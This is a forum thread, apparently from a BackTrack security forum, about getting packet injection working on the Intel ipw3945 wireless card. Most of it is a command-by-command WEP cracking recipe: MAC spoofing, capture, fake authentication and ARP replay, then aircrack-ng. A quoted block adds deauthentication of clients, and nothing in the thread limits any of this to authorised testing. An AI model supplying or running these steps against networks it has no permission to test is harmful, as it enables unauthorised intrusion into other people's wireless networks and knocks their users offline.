This sounds great. Hopefully they will figure this out beacause most of the notebooks i come across only come with IPW3945.
Editing this thread slightly because its the first hit in google for ipw3945 injection.
injection with ipw3945 quick guide with backtrack 3 final.
1. modprobe -r iwl3945
2. modprobe ipwraw
3. macchanger --mac 00:11:22:33:44:55 wifi0
4. airmon-ng start wifi0
5. airodump -c "CHANNEL" -w "FILETOCRACK" -bssid "ACCESS POINTS BSSID" wifi0 [LEAVE RUNNING]
New Shell.
1. aireplay -1 0 -a "ACCESS POINTS BSSID" -h 00:11:22:33:44:55 wif0
2. aireplay -3 -b "ACCESS POINTS BSSID" -h 00:11:22:33:44:55 wifi0
Collect packets and data can range from few seconds to 30 minutes - 5000 ivs for 64 bit and 20,000 for 128 bit key
New shell.
1. aircrack-ng FILETOCRACK.cap
Enjoy.
This sounds great. Hopefully they will figure this out beacause most of the notebooks i come across only come with IPW3945.
Googled "ipw3945 Injection" and found answers to your questions within 3 minutes. This is not the Seguridad Wireless forum you might have better luck there.
Pulled from there forum:
Code:ifconfig wifi0 down chmod u+wrx /sys/class/net/wifi0/device/rate echo 12 >/sys/class/net/wifi0/device/rate echo <channel> >/sys/class/net/wifi0/device/channel ifconfig wifi0 up airodump-ng -w file rtap0 aireplay-ng -1 0 -e ESSID -a BSSID -h STATION wifi0 aireplay-ng -3 -b BSSID -h STATION wifi0 aireplay-ng -0 5 -a BSSID -c STATION
Chalk another one up for the all knowing google.
read more here
I won't put this into the spam bin as it's both promoting another distro (through an online shop!) but also suggesting how to get support for the card in BT, but don't push it - if you want to get involved in this with the developers, join #remote-exploit on Freenode (IRC) and let them know. I'm sure your intentions were good, don't get me wrong.
Cheers,
Mother
In God we trust, all others we monitor